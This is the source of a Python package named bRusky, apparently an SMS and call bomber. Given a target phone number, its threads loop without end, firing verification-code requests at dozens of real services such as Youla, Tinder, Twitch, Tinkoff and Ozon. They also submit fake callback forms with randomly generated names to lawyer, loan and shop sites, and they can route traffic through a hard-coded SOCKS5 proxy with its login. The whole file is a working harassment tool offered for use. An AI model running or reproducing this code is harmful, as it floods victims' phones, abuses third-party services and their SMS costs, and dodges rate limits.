import threading
import bRusky.sendSMS
import bRusky.sendCALLS
from bRusky.exceptions import TypeError
import time


class threaded_spamer(threading.Thread):
    def __init__(self, number, enable_proxy: bool):
        threading.Thread.__init__(self)
        self.enable_proxy = enable_proxy
        self.number = number

    def spamSMS(self):
        spamer = bRusky.sendSMS.spamer(number=self.number, enable_proxy=self.enable_proxy)
        spamer.start()

    def spamCALLS(self):
        spamer = bRusky.sendCALLS.spamer(number=self.number, enable_proxy=self.enable_proxy, name='Константин')
        spamer.start()

    def run(self):
        thread = threading.Thread(target=self.spamCALLS)
        thread.start()
        while True:
            thread = threading.Thread(target=self.spamSMS)
            thread.start()
            time.sleep(60)


class Rusky:
    def __init__(self, number: str, enable_proxy: bool):
        if type(enable_proxy) == bool and type(number) == str:
            self.proxy = enable_proxy
            self.number = number
        else:
            raise TypeError("Error")

    def start(self):
        thread = threaded_spamer(number=self.number, enable_proxy=self.proxy)
        thread.start()



import random
import transliterate
import requests
import time
import datetime


class spamer:
    def __init__(self, number: str, name: str, enable_proxy: bool):
        if type(number) == str and type(name) == str and type(enable_proxy) == bool:
            self.date = str(datetime.datetime.today()).split(' ')[0]
            self.randomNames = (
                'Алексей', 'Иван', 'Константин', 'Петр', 'Семен', 'Матвей', 'Станислав', 'Владимир', 'Олег', 'Сергей')
            self.randomSurNames = (
                'Иванов', 'Смирнов', 'Кузнецов', 'Попов', 'Васильев', 'Петров', 'Соколов', 'Михайлов', 'Новиков',
                'Фёдоров',
                'Морозов', 'Волков')
            self.rnadomOtch = (
                'Богданович', 'Маркович', 'Олегович', 'Глебович', 'Александрович', 'Дмитриевич', 'Егорович',
                'Георгиевич',
                'Львович', 'Кириллович')
            self.number = number
            self.name = name
            self.enable_proxy = enable_proxy
            self.countErrors = 0
            self.randomCount = int((random.random() * 10) + 10)
            self.randomTZ = int(random.random() * 10)
            self.randomID = str(random.randint(1, 9)) + str(random.randint(1, 9)) + str(random.randint(1, 9)) + str(
                random.randint(1, 9)) + str(random.randint(1, 9))
            self.problem = 'Здравствуйте, у меня есть проблема'
            self.randomEmail = transliterate.translit(random.choice(self.randomNames),
                                                      reversed=True) + transliterate.translit(
                random.choice(self.randomSurNames), reversed=True) + '@gmail.com'
            self.randomPassword = transliterate.translit(random.choice(self.randomNames),
                                                         reversed=True) + transliterate.translit(
                random.choice(self.randomSurNames), reversed=True)
            self.numberVodaonline = '79852141247'
            self.bPrava = '78005504937'

    def start(self):
        try:
            requests.post('http://smart-lift.com.ua/1.php',
                          data={'txtself.name': self.name, 'txtphone': self.number, 'valTrFal': 'valTrFal_true',
                                'test': ''})
        except:
            self.countErrors += 1

        try:
            requests.post('https://junker.kiev.ua/postmaster.php',
                          data={'self.name': self.name, 'tel': self.number, 'action': 'callme'})
        except:
            self.countErrors += 1

        try:
            requests.post('https://www.big-partner.kh.ua/index.php?route=unishop/request/mail',
                          data={'type': 'Заказ звонка', 'customername': self.name,
                                'customerphoneNum': self.number})

        except:
            self.countErrors += 1

        try:
            requests.post('https://red-caviar.biz.ua/order.php',
                          data={'self.name': self.name, 'phone': self.number, 'meta': '2'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://novogodneepostelnoe.ru/index.php?route=extension/module/callback',
                          data={'self.name': self.name, 'phone': self.number, 'comment': '', 'action': 'send'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://bistrodengi.ru/ajax/lead.php',
                          data={'fio': self.name, 'phone': self.number})

        except:
            self.countErrors += 1

        try:
            requests.post('https://zaymigo.com/register',
                          data={'role': 'borrower', 'registerself.number': self.number,
                                'password': self.randomPassword,
                                'password_confirm': self.randomPassword, 'register_agreements': 1,
                                'register_agreements': 1, 'timezone': self.randomTZ, 'step': 1, 'sum': 10000,
                                'repayment_method': 'once', 'period': 12, 'promoCode': '',
                                'appliedPromoCode': '', 'appliedDiscount': ''})

        except:
            self.countErrors += 1

        try:
            requests.post('https://www.zaim-express.ru/engine/orders2.php',
                          data={'type_amount': 0, 'phone': self.number, 'source': '', 'clickid': '',
                                'webid': '', 'reffer': 'www.google.com', 'site': 'www.zaim-express.ru/'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://xn--80acmlhv0b.xn--80anhm9e.xn--p1ai/gate/public/api/v1/user/phone',
                          data={'phone': self.number})

        except:
            self.countErrors += 1

        try:
            requests.post('https://www.moneza.ru/ws/public/callback-request',
                          data={'clientFullName': self.name, 'phoneNumber': self.number,
                                'timezoneOffsetString': -420})

        except:
            self.countErrors += 1

        try:
            requests.post('https://timezaim.ru/app/',
                          data={'SUMMA': self.randomCount, 'DAY': 90, 'TARIFname': '', 'TARIF': 'main',
                                'SUM': '',
                                'DAYS': '', 'STEP': -1, 'main': 'Y', 'needphoneNum': self.number})

        except:
            self.countErrors += 1

        try:
            requests.post(
                'https://telephony.jivosite.com/api/1/sites/359606/widgets/jbgpFn43Y1/clients/' + str(
                    random.randint(1, 9)) + str(random.randint(1, 9)) + str(random.randint(1, 9)) + str(
                    random.randint(1, 9)) + str(random.randint(1, 9)) + str(
                    random.randint(1, 9)) + '/telephony/callback', data={'phone': self.number, 'invitationproblem': ''})

        except:
            self.countErrors += 1

        try:
            requests.post('https://api.creditter.ru/feedback/phone', json={'phone': self.number})

        except:
            self.countErrors += 1

        try:
            requests.post('https://creditplus.ru/wp-core/wp-admin/admin-ajax.php?action=callbackPhone',
                          data={'number': self.number, 'confirmation_code': '', 'action': 'callbackPhone'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://telephony.jivosite.com/api/1/sites/6235/widgets/zjrL6mQMKT/clients/' + str(
                random.randint(1, 9)) + str(random.randint(1, 9)) + str(random.randint(1, 9)) + str(
                random.randint(1, 9)) + str(random.randint(1, 9)) + '/telephony/callback',
                          data={'phone': self.number, 'invitationproblem': ''})

        except:
            self.countErrors += 1

        try:
            requests.post('https://bukvaprava.ru/wp-admin/admin-ajax.php',
                          data={'text_quest_banner': self.problem, 'self.name': self.name, 'city': 'Москва',
                                'tel': self.number, 'ip': '192.168.1.777',
                                'form_page': 'https://bukvaprava.ru/', 'referer': '',
                                'action': 'ajax-lead'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://www.yurist-online.net/lead_question',
                          data={'region': '27', 'question': self.problem, 'self.name': self.name,
                                'phone': self.number,
                                'email': self.randomEmail.lower(), 'partner_id': '13'})

        except:
            self.countErrors += 1

        try:
            requests.post('http://xn----8sbgev0cabfflr7k.xn--p1ai/scripts/form-u22118.php',
                          data={'custom_U22127': self.numberVodaonline})

        except:
            self.countErrors += 1

        try:
            requests.post('http://s1.nice-cream.ru/phone-widget2/sendRequest.php',
                          data={'phone': '+' + self.number, 'self.name': self.name, 'sid': '*',
                                'gclid': '0',
                                'openstat': 'direct.yandex.ru;12345678;123456789;yandex.ru:premium',
                                'utm': ''})

        except:
            self.countErrors += 1

        try:
            requests.post('https://rossovet.ru/qa/msgsave/save',
                          data={'self.name': self.name, 'comment': self.problem, 'city': 'Москва',
                                'phoneprefix': '(' + self.number + ')', 'phone': self.number,
                                'partnerID': '10',
                                'ref': 'https://yandex.ru/clck/', 'number1': '7', 'number2': '8',
                                'checkcode': '15'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://yuridicheskaya-konsultaciya.com/Home/_FormPost',
                          data={'self.name': self.name, 'Phone': self.number, 'Description': self.problem})

        except:
            self.countErrors += 1

        try:
            requests.post('https://epleads.ru/gate/api.php',
                          data={'question': self.problem, 'region': 'Москва', 'first_lastself.name': self.name,
                                'phone': self.number, 'ofrid': '1', 'wid': '3', 'presetid': '4',
                                'referer': 'https://potreb-prava.com/konsultaciya-yurista/konsultaciya-onlajn-yurista-besplatno-kruglosutochno.html',
                                'ip': '213.154.55.496', 'mobile': '0',
                                'template': 'form_master.new.fix.metrik_lawyer-blue-default',
                                'product': 'lawyer', 'userSoftData': '*'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://pravonedv.ru/proxy_8d34201a5b.php?a___=1',
                          data={'email': self.randomEmail.lower(), 'phone': self.numberVodaonline,
                                'location': 'Москва, Россия', 'self.name': self.name, 'offer': '0',
                                'ip': '263.87.162.98', 'device': 'desktop', 'token': '*',
                                'template': 'two_page3', 'referrer': 'https://yandex.ru/clck/',
                                'domain': 'pravonedv.ru', 'wm_id': '548',
                                'url': 'https://pravonedv.ru/besplatnye-onlajn-konsultacii-yurista'})

        except:
            self.countErrors += 1

        try:
            requests.post(
                'https://xn----etbqwledi5fza.xn--p1ai/wp-json/contact-form-7/v1/contact-forms/295/feedback',
                data={'_wpcf7': '295', '_wpcf7_version': '5.0.5', '_wpcf7_locale': 'ru_RU',
                      '_wpcf7_unit_tag': 'wpcf7-f295-o2', '_wpcf7_container_post': '0', 'text-838': self.name,
                      'tel-231': self.number, 'textarea-472': self.problem, 'hidden-278': 'Главная'})

        except:
            self.countErrors += 1

        try:
            requests.post('http://www.gurist.ru/wp-json/contact-form-7/v1/contact-forms/3591/feedback',
                          data={'_wpcf7': '3591', '_wpcf7_version': '5.0', '_wpcf7_locale': 'ru_RU',
                                '_wpcf7_unit_tag': 'wpcf7-f3591-o1', '_wpcf7_container_post': '0',
                                'your-self.name': self.name, 'tel-147': self.problem})

        except:
            self.countErrors += 1

        try:
            requests.post('https://moskva.beeline.ru/customers/products/mobile/services/createmnporder/',
                          data={'leadName': 'PodborSim', 'phone': self.number, 'region': '98140'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://advokatmakeev.ru/form.php',
                          data={'oname': self.name, 'otel': self.numberVodaonline, 'omail': '',
                                'omess': self.problem, 'otype': '1'})

        except:
            self.countErrors += 1

        try:
            requests.post('http://mkamsk.ru/apply_auto_form',
                          data={'Form[9]': self.name, 'Form[12]': self.number, 'Form[11]': self.problem,
                                'url': 'http://mkamsk.ru/', 'check': 'check'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://usachev.vip/wp-admin/admin-ajax.php',
                          data={'action': 'bazz_widget_action', 'phone': '+' + self.number, 'self.name': ''})

        except:
            self.countErrors += 1

        try:
            requests.post('http://pravo-sfera.ru/auxpage_zayavk/',
                          data={'cname': self.name, 'c_tel': self.numberVodaonline, 'quest': self.problem,
                                'uest_go': 'Задать вопрос'})

        except:
            self.countErrors += 1

        try:
            requests.post('https://urist-expert24.ru/send-lead/',
                          data={'name': self.name, 'phone': self.numberVodaonline,
                                'form-name': 'Заказ обратного звонка'})

        except:
            self.countErrors += 1

        try:
            requests.post('http://law-divorce.ru/wp-admin/admin-ajax.php',
                          data={'ip_address': '', 'ip_country': '', 'ip_region': '', 'ip_city': '',
                                'url': '', 'action': 'lld_send_lead', 'text': self.problem,
                                'self.name': self.name,
                                'telephone': '+' + self.bPrava, 'city': 'Москва'})

        except:
            self.countErrors += 1

        try:
            requests.post('http://www.gos-urist.ru/send.php',
                          {'name': self.name, 'code': self.number, 'phone': self.number,
                           'issue': self.problem})

        except:
            self.countErrors += 1

        try:
            requests.post('http://9911030.ru/orderform.php',
                          {'name': self.name, 'phone': self.number, 'message': self.problem})

        except:
            self.countErrors += 1

        try:
            requests.get('https://findclone.ru/register?phone=' + self.number,
                         params={'phone': self.number})

        except:
            self.countErrors += 1

        print('Errors for calls: ' + str(self.countErrors))
        time.sleep(60)



import requests
import time


class spamer:
    def __init__(self, number: str, enable_proxy: bool):
        if enable_proxy:
            self.proxy = dict(http='socks5://proxy:PassWord1023@p.sb30.ru:443',
                              https='socks5://proxy:PassWord1023@p.sb30.ru:443')
        else:
            self.proxy = None
        self.number = number
        self.countErrors = 0

    def start(self):
        while True:
            try:
                requests.get('https://api.wowworks.ru/v2/site/send-code', json={"phone": self.number, "type": 2},
                             proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post('https://youla.ru/web-api/auth/request_code', data={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1

            try:
                requests.post('https://www.yaposhka.kh.ua/customer/account/createpost/',
                              data={"success_url": "", "error_url": "", "is_subscribed": "0",
                                    "firstname": 'dfgdfgdfgdfg',
                                    "lastname": 'sdfgdfgdfgdfgfdg', "email": 'dfgdfgdfgdfggdfgdf@gmail.com',
                                    "password": 'sdfsdfsdfsdfsdfsdfsdf',
                                    "password_confirmation": 'sdfsdfsdfsdfsdfsdfsdf',
                                    "telephone": self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1

            try:
                requests.post('https://api.iconjob.co/api/auth/verification_code', json={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1

            try:
                requests.post('https://cabinet.wi-fi.ru/api/auth/by-sms', data={"msisdn": self.number},
                              headers={"App-ID": "cabinet"}, proxies=self.proxy)
            except:
                self.countErrors += 1

            try:
                requests.post('https://ng-api.webbankir.com/user/v2/create',
                              json={"lastName": 'sdfsdfsdf', "firstName": 'sdfggdfg', "middleName": 'sdfsdf',
                                    "mobilePhone": self.number,
                                    "email": 'dfgdfgdfgdfggdfgdf@gmail.com', "smsCode": ""}, proxies=self.proxy)
            except:
                self.countErrors += 1

            try:
                requests.post('https://shop.vsk.ru/ajax/auth/postSms/', data={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1

            try:
                requests.post('https://www.uklon.com.ua/api/v1/account/code/send',
                              headers={"client_id": "6289de851fc726f887af8d5d7a56c635"}, json={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://passport.twitch.tv/register?trusted_request=true",
                              json={"birthday": {"day": 11, "month": 11, "year": 1999},
                                    "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True,
                                    "password": 'dfgdfgdffgd', "phone_number": self.number,
                                    "username": 'sdfsdfsfsfsdfsdf'}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://api.tinkoff.ru/v1/sign_up", data={"phone": "+" + self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru",
                              data={"phone_number": self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://msk.tele2.ru/api/validation/number/" + self.number, json={"sender": "Tele2"},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://api.sunlight.net/v3/customers/authorization/", data={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.get("https://www.sportmaster.ua/",
                             params={"module": "users", "action": "SendSMSReg", "phone": self.number},
                             proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.get("https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper",
                             params={"oper": 9, "callmode": 1, "phone": "+" + self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://shopandshow.ru/sms/password-request/",
                              data={"phone": "+" + self.number, "resend": 0}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://app.sberfood.ru/api/mobile/v3/auth/sendSms",
                              json={"userPhone": "+" + self.number},
                              headers={"AppKey": "WebApp-3a2605b0cf2a4c9d938752a84b7e97b6"}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://pass.rutube.ru/api/accounts/phone/send-password/", json={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://app.redmondeda.ru/api/v1/app/sendverificationcode", headers={"token": "."},
                              data={"phone": self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://plink.tech/resend_activation_token/?via=call", json={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.get("https://cabinet.planetakino.ua/service/sms", params={"phone": self.number},
                             proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://www.ozon.ru/api/composer-api.bx/_action/fastEntry",
                              json={"phone": self.number, "otpId": 0}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.get("https://secure.online.ua/ajax/checkself.number/", params={"regself.number": self.number},
                             proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://www.ollis.ru/gql", json={
                    "query": 'mutation { phone(number:"%s", locale:ru) { token error { code message } } }' % self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone",
                              data={"st.r.phone": "+" + self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://www.nl.ua", data={"component": "bxmaker.authuserphone.login",
                                                         "sessid": "bf70db951f54b837748f69b75a61deb4",
                                                         "method": "sendCode", "phone": self.number,
                                                         "registration": "N"}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://account.my.games/signup_send_sms/", data={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post(
                    "https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCode",
                    params={"pageName": "registerPrivateUserPhoneVerificatio"},
                    data={"phone": self.number, "recaptcha": "off", "g-recaptcha-response": ""}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://auth.multiplex.ua/login", json={"login": self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://www.moyo.ua/identity/registration",
                              data={"firstname": 'name', "phone": self.number, "email": 'dsfssdfsdfsdfsd@gmail.com'},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://www.monobank.com.ua/api/mobapplink/send", data={"phone": "+" + self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://mobileplanet.ua/register",
                              data={"klient_name": 'name', "klientself.number": "+" + self.number,
                                    "klient_email": 'emasdfssssssdfgsgil@gmail.com'}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://www.menu.ua/kiev/delivery/registration/direct-registration.html",
                              data={"user_info[fullname]": 'nsdfsdfame', "user_info[phone]": self.number,
                                    "user_info[email]": 'sdfsdfsdfsdfsffsf@gmail.com',
                                    "user_info[password]": 'dfgdfgdfg',
                                    "user_info[conf_password]": 'dfgdfgdfg', }, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://cloud.mail.ru/api/v2/notify/applink",
                              json={"phone": "+" + self.number, "api": 2, "email": "sdfsdfsdfsdfsffsf@gmail.com",
                                    "x-email": "sdfsdfsdfsdfsffsf@gmail.com", },
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://lenta.com/api/v1/authentication/requestValidationCode",
                              json={"phone": "+" + self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://api.kinoland.com.ua/api/v1/service/send-sms", headers={"Agent": "website"},
                              json={"Phone": self.number, "Type": 1}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://app-api.kfc.ru/api/v1/common/auth/send-validation-sms",
                              json={"phone": "+" + self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://api.ivi.ru/mobileapi/user/register/phone/v6", data={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://ube.pmsm.org.ru/esb/iqos-phone/validate", json={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://lk.invitro.ru/sp/mobileApi/createUserByPassword",
                              data={"password": 'dfgdfgdfg', "application": "lkp", "login": "+" + self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://terra-1.indriverapp.com/api/authorization?locale=ru",
                              data={"mode": "request", "phone": "+" + self.number, "phone_permission": "unknown",
                                    "stream_id": 0, "v": 3, "appversion": "3.20.6", "osversion": "unknown",
                                    "devicemodel": "unknown", }, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://icq.com/smscode/login/ru", data={"msisdn": self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://helsi.me/api/healthy/accounts/login",
                              json={"phone": self.number, "platform": "PISWeb"}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://guru.taxi/api/v1/driver/session/verify",
                              json={"phone": {"code": 1, "number": self.number}}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://fix-price.ru/ajax/registerself.number_code.php",
                              data={"register_call": "Y", "action": "getCode", "phone": "+" + self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.get("https://findclone.ru/register", params={"phone": "+" + self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://www.finam.ru/api/smslocker/sendcode", data={"phone": "+" + self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://api.easypay.ua/api/auth/register",
                              json={"phone": self.number, "password": 'dfgdfgdfgdfgdfgdfgdf'}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://dostavista.ru/backend/send-verification-sms", data={"phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://app.cloudloyalty.ru/demo/send-code",
                              json={"country": 2, "phone": self.number, "roistatVisit": "47637",
                                    "experiments": {"new_header_title": "1"}, }, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://city24.ua/personalaccount/account/registration",
                              data={"PhoneNumber": self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://www.citilink.ru/registration/confirm/phone/+" + self.number + "/")
            except:
                self.countErrors += 1
            try:
                requests.post("https://api.carsmile.com/",
                              json={"operationName": "enterPhone", "variables": {"phone": self.number},
                                    "query": "mutation enterPhone($phone: String!) {\n  enterPhone(phone: $phone)\n}\n", },
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://app.benzuber.ru/login", data={"phone": "+" + self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://alfalife.cc/auth.php", data={"phone": self.number}, proxies=self.proxy)
            except:
                self.countErrors += 1
            try:
                requests.post("https://3040.com.ua/taxi-ordering", data={"callback-phone": self.number},
                              proxies=self.proxy)
            except:
                self.countErrors += 1
            print('Errors for sms: ' + str(self.countErrors))
            time.sleep(22)



from setuptools import setup, find_packages
from os.path import join, dirname

setup(
    name='bRusky',
    version='0.3.6',
    packages=find_packages(),
    install_requires=[
    'requests',
    'transliterate',
    'pysocks',
    'requests[socks]',
    ],
    entry_points={
        'console_scripts':
            ['bRusky = bRusky.commands:bRusky']
    }
)